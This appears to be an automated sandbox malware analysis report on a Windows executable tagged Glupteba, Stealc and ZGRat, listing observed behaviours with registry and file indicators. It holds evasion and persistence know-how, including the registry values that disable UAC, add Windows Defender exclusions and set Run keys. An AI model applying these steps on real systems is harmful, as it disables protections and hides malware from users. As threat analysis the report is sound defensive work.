Malware Analysis Report

2024-11-13 16:30

Sample ID 240510-kcrmfsga87
Target 5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe
SHA256 5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f
Tags
glupteba stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f

Threat Level: Known bad

The file 5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe was found to be: Known bad.

Malicious Activity Summary

glupteba stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer trojan upx

Windows security bypass

Glupteba payload

Glupteba

ZGRat

UAC bypass

Detect ZGRat V1

Stealc

Modifies boot configuration data using bcdedit

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Downloads MZ/PE file

Reads data files stored by FTP clients

Drops startup file

Executes dropped EXE

Loads dropped DLL

UPX packed file

Checks computer location settings

Reads user/profile data of web browsers

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Manipulates WinMonFS driver.

Manipulates WinMon driver.

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Program crash

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Uses Task Scheduler COM API

System policy modification

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 08:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 08:27

Reported

2024-05-10 08:30

Platform

win7-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wPtHZQ5vPdfaakL1wkqQ9xud.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\8ZqLGNH2YJDVFBCte8UAV3l8.exe = "0" C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\L668OyeExs0cF7hoU0qrfgo4.exe = "0" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\1zxDwRKfAb5DhSaC0THw4Vwu.exe = "0" C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A

ZGRat

rat zgrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CmJIWq2wc2BVSDGVagOVsd2b.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dGmP267yt3axoeXJ1O4oq2yr.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gH39aaHNd7QHbMZoFEbtbhje.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\weOd5vvE5X0n0UJO4Opa6iy0.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VoHJVuzNpYfgFk8sQ8PrQxJ2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bkWZHcXpRB7mEIZ3AR719Izc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sb0GbCygpb3KGmGgMkUH6TmP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\1zxDwRKfAb5DhSaC0THw4Vwu.exe = "0" C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\L668OyeExs0cF7hoU0qrfgo4.exe = "0" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wPtHZQ5vPdfaakL1wkqQ9xud.exe = "0" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\8ZqLGNH2YJDVFBCte8UAV3l8.exe = "0" C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2872 set thread context of 2512 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20240510082806.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u8k.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u8k.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u8k.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u8k.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-492 = "India Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Windows\windefender.exe N/A
